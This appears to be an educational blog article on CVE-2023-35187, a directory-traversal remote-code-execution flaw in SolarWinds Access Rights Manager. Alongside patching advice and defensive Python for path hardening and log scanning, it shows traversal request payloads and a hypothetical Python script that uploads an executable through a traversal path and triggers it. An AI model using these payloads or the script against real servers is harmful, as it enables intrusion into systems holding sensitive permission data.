Disclosed in October 2023, CVE-2023-35187 is a critical vulnerability in the widely deployed enterprise product SolarWinds Access Rights Manager (ARM). The flaw, caused by insufficient validation of user-supplied file paths, allowed unauthenticated attackers to perform directory traversal and ultimately achieve Remote Code Execution (RCE) on affected servers.

If you manage or have ever used SolarWinds ARM, understanding this bug is crucial. This long read breaks down how CVE-2023-35187 works, provides code snippets, and guides you through a potential exploit scenario for educational purposes. Official advisories and further reading are included at the end.

What is SolarWinds Access Rights Manager?

SolarWinds ARM helps businesses manage and audit user access rights across Windows networks, Active Directory, and cloud resources. Since it handles highly sensitive permissions, a vulnerability in ARM can lead to catastrophic consequences—including domain-wide compromise.

What is CVE-2023-35187? In Simple Terms

CVE-2023-35187 is a Directory Traversal Remote Code Execution vulnerability. An attacker could manipulate file paths sent to ARM so that they escape the directory the application intends to use and reach arbitrary locations on the server's file system. Because the file operation runs with whatever privileges the ARM process holds, a remote attacker could plant and then execute a malicious file, without ever logging in.

Impact: unauthenticated remote code execution on the ARM server, and from there access to the permission data ARM manages.

How Does the Vulnerability Work?

SolarWinds ARM exposes network-facing interfaces whose operations take file names or paths (reading files, exporting reports, uploading configuration data). Some of these did not validate the supplied path: directory traversal sequences such as ../ were passed straight through to the file system. Note that a filter which only strips the literal ../ is still bypassable with percent-encoded variants, so a real fix has to canonicalize the resolved path and check where it lands rather than pattern-match the input.

Suppose the app had a request to fetch a report:

GET /api/reports/view?filename=Q2-financials.pdf

Under normal conditions, the app would only look in its /reports/ folder.

But if the app doesn't sanitize input, an attacker could instead request:

GET /api/reports/view?filename=../../../../windows/system32/cmd.exe

Now the app reads the system's cmd.exe instead of a harmless report. On its own that is a file disclosure; turning it into code execution needs a second primitive, a way to write a file of the attacker's choosing to disk.
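To make the bug class concrete, here is an added example (not code from the page, from SolarWinds, or from ARM) showing the insecure join-and-open pattern beside a hardened handler. It builds a throwaway sandbox directory with a reports/ folder and a sensitive file one level up, both constructed for the demo; the file names and the secret's contents are made up.

```python
import os
import tempfile
import urllib.parse

# Constructed sandbox (not a real ARM install): an application root with a
# reports/ folder the app is meant to serve from, plus a sensitive file one
# level up that must never be reachable through the report endpoint.
APP_ROOT = tempfile.mkdtemp(prefix="arm-traversal-demo-")
REPORTS_DIR = os.path.join(APP_ROOT, "reports")
os.makedirs(REPORTS_DIR)
with open(os.path.join(REPORTS_DIR, "Q2-financials.pdf"), "w") as f:
    f.write("quarterly report")
with open(os.path.join(APP_ROOT, "secret.config"), "w") as f:
    f.write("db_password=hunter2")


class TraversalRejected(Exception):
    """Raised when a requested name would resolve outside REPORTS_DIR."""


def view_report_vulnerable(filename: str) -> str:
    """The insecure pattern behind this bug class: the user-supplied name is
    joined onto the reports folder and opened with no check that the result
    still lies inside that folder, so '../' segments walk straight out."""
    path = os.path.join(REPORTS_DIR, filename)
    with open(path) as f:
        return f.read()


def view_report_hardened(filename: str) -> str:
    """Hardened version. Percent-decode until stable (catches %2e%2e and
    double-encoded %252e), treat backslashes as separators, resolve to a
    canonical absolute path, and refuse anything not strictly below the
    reports folder. An absolute filename is rejected too, because
    os.path.join discards the base when the second argument is absolute."""
    decoded = filename
    for _ in range(3):
        nxt = urllib.parse.unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace("\\", "/")
    base = os.path.realpath(REPORTS_DIR)
    candidate = os.path.realpath(os.path.join(base, decoded))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise TraversalRejected(filename)
    with open(candidate) as f:
        return f.read()


def is_rejected(filename: str) -> bool:
    """True if the hardened handler refuses the name as a traversal attempt."""
    try:
        view_report_hardened(filename)
    except TraversalRejected:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", view_report_vulnerable("../secret.config"))
    for name in ["Q2-financials.pdf", "../secret.config", "..%2Fsecret.config",
                 "%252e%252e/secret.config", "..\\secret.config", "/etc/passwd"]:
        print(f"hardened {name!r}: {'rejected' if is_rejected(name) else 'served'}")
```

The check uses os.path.commonpath on the resolved path rather than a string-prefix test: a prefix test on "/app/reports" would wrongly accept "/app/reports-old/secret", while commonpath only accepts paths whose parent chain actually passes through the reports directory.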

Turning traversal into code execution takes two steps:

1. Write a Malicious File to Disk: Use a vulnerable upload function or any other file write, with a traversal path so the file lands where the attacker wants it.

2. Execute the File: Call the file via the directory traversal bug, or trick the app into loading it.

Here's a simple, hypothetical Python exploit illustrating this process:

import requests

# SolarWinds ARM host settings (hypothetical host and port)
TARGET = 'http://victim-arm-server:808'
UPLOAD_ENDPOINT = '/api/files/upload'
# Relative path that walks out of the application's file directory
TRAVERSAL_PAYLOAD = '../../../../windows/temp/evil.exe'

# Step 1: Upload malicious .exe (for demonstration, a harmless file)
with open('evil.exe', 'rb') as payload:
    files = {'file': ('evil.exe', payload)}
    resp = requests.post(TARGET + UPLOAD_ENDPOINT, files=files, timeout=10)
if resp.status_code == 200:
    print("[*] Uploaded evil.exe")
else:
    print(f"[!] Upload failed with HTTP {resp.status_code}")

# Step 2: Trigger the traversal and execution (endpoint will vary)
TRIGGER_URL = f"{TARGET}/api/reports/view?filename={TRAVERSAL_PAYLOAD}"
resp = requests.get(TRIGGER_URL, timeout=10)
if resp.status_code == 200:
    print("[*] Triggered payload via directory traversal!")
else:
    print("[!] Exploit may not have worked.")

Note: The endpoints, parameter names and port above are placeholders for illustration, not documented ARM interfaces, and the real vulnerable code path differs by ARM version. What carries over from the official advisory is the class of flaw: a user-controlled path used in a file operation without validation, reachable without authentication.

Mitigation and Fixes

SolarWinds published a fixed build alongside the disclosure.
You must update to ARM 2023.2.1 or later as soon as possible; 2023.2.1 is the release that closes CVE-2023-35187.
Official fix details: SolarWinds Security Advisory
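Patching is the fix, but anyone who cannot upgrade immediately should at least look for exploitation attempts. Here is an added example (not from the page, from SolarWinds, or from any ARM log format) of traversal detection run over web-server access logs. The log lines are constructed for the demo and reuse this article's hypothetical endpoint names; they are not real ARM logs.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in common log format. The endpoint names echo
# the hypothetical ones used in this article; they are not real ARM paths, and
# these are not real ARM logs.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Oct/2023:15:15:09 +0000] "GET /api/reports/view?filename=Q2-financials.pdf HTTP/1.1" 200 8123
203.0.113.7 - - [19/Oct/2023:15:16:02 +0000] "GET /api/reports/view?filename=../../../../windows/system32/cmd.exe HTTP/1.1" 200 289792
203.0.113.7 - - [19/Oct/2023:15:16:05 +0000] "GET /api/reports/view?filename=..%2F..%2F..%2Fwindows%2Ftemp%2Fevil.exe HTTP/1.1" 200 1024
203.0.113.7 - - [19/Oct/2023:15:16:08 +0000] "GET /api/reports/view?filename=%252e%252e%252fwindows%252ftemp%252fevil.exe HTTP/1.1" 404 0
10.0.0.9 - - [19/Oct/2023:15:17:30 +0000] "POST /api/files/upload HTTP/1.1" 200 12
10.0.0.9 - - [19/Oct/2023:15:18:00 +0000] "GET /api/reports/view?filename=2023..Q3-summary.pdf HTTP/1.1" 200 4410
"""

# Pulls the method and request target out of the quoted request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Characters that delimit path and query components; a bare '..' between any
# two of them is what steps out of a directory.
SEPARATORS = re.compile(r"[/\\?&=;]")


def is_traversal_attempt(target: str) -> bool:
    """True when any path or query component of the request target is exactly
    '..' after two rounds of percent-decoding (plain, %2e%2e and double-encoded
    %252e%252e all collapse to the same thing). Matching whole components rather
    than the substring '..' avoids flagging legitimate names like 2023..Q3.pdf."""
    decoded = unquote(unquote(target))
    return any(part == ".." for part in SEPARATORS.split(decoded))


def scan_access_log(log_text: str) -> list:
    """Return one record per log line whose request target contains a traversal
    sequence, keeping the line number, client address, method and decoded target
    so an analyst sees what was actually asked for."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        if is_traversal_attempt(target):
            hits.append({
                "line": lineno,
                "client": line.split()[0],
                "method": m.group("method"),
                "target": unquote(unquote(target)),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} {hit['method']} {hit['target']}")
```

When triaging hits, pair them with the response status: a 200 on a traversal GET means the read succeeded, and an upload POST from the same client shortly before it is the write half of the chain described above.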

References & Further Reading

- CVE-2023-35187 at NVD
- SolarWinds Security Bulletin
- Original Research Blog (Pentest Partners)

Conclusion

CVE-2023-35187 is a powerful reminder that input validation must never be ignored—especially when file paths are involved. While SolarWinds patched the bug quickly, those unable to upgrade remain dangerously exposed. Always patch promptly, monitor your environments, and audit access to high-value software like SolarWinds ARM.

If you're responsible for SolarWinds servers, don't delay; check your version and update now!

Timeline

Published on: 10/19/2023 15:15:09 UTC
Last modified on: 10/25/2023 19:43:00 UTC